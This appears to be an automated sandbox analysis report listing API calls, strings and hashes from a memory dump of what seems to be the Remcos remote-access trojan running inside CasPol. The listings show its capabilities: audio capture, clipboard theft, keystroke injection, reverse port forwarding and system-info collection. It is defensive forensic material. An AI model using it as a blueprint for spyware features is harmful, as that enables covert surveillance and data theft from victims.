                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                            • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Eventinet_ntoa
                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                            • Opcode ID: a0e50ccda90a2a26dadb1d16707f1d5cfbd962b288e482a8d4bbee57c7584a3f
                                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                            • Opcode Fuzzy Hash: a0e50ccda90a2a26dadb1d16707f1d5cfbd962b288e482a8d4bbee57c7584a3f
                                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                            APIs
                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer
                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                            • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                            • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                            • Opcode ID: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                            • Opcode Fuzzy Hash: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                            APIs
                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                            • Opcode ID: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                            • Opcode Fuzzy Hash: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                            • API String ID: 1356121797-903574159
                                                                                                            • Opcode ID: 9e2cea49310788973e28f4dca2d7768dd8cda20142605a9da29a420407449fc1
                                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                            • Opcode Fuzzy Hash: 9e2cea49310788973e28f4dca2d7768dd8cda20142605a9da29a420407449fc1
                                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                            • String ID: Remcos
                                                                                                            • API String ID: 1970332568-165870891
                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                            • Opcode Fuzzy Hash: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                            • __freea.LIBCMT ref: 00452DAA
                                                                                                            • __freea.LIBCMT ref: 00452DB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 201697637-0
                                                                                                            • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                            • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                            • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                            • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                            • _free.LIBCMT ref: 00444714
                                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                                            • _free.LIBCMT ref: 00444768
                                                                                                            • _free.LIBCMT ref: 00444774
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                            • String ID: C
                                                                                                            • API String ID: 1679612858-1037565863
                                                                                                            • Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                                            • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                            • Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                                            • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tcp$udp
                                                                                                            • API String ID: 0-3725065008
                                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                            APIs
                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                                            • API String ID: 1596592924-2461731529
                                                                                                            • Opcode ID: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                            • Opcode Fuzzy Hash: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                            • String ID: .part
                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                            • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                            • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                            • API String ID: 37874593-703403762
                                                                                                            • Opcode ID: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                                                            • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                            • Opcode Fuzzy Hash: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                                                            • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864826663-0
                                                                                                            • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                            • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                            APIs
                                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InputSend$Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1167301434-0
                                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2172192267-0
                                                                                                            • Opcode ID: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                            • Opcode Fuzzy Hash: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 314583886-0
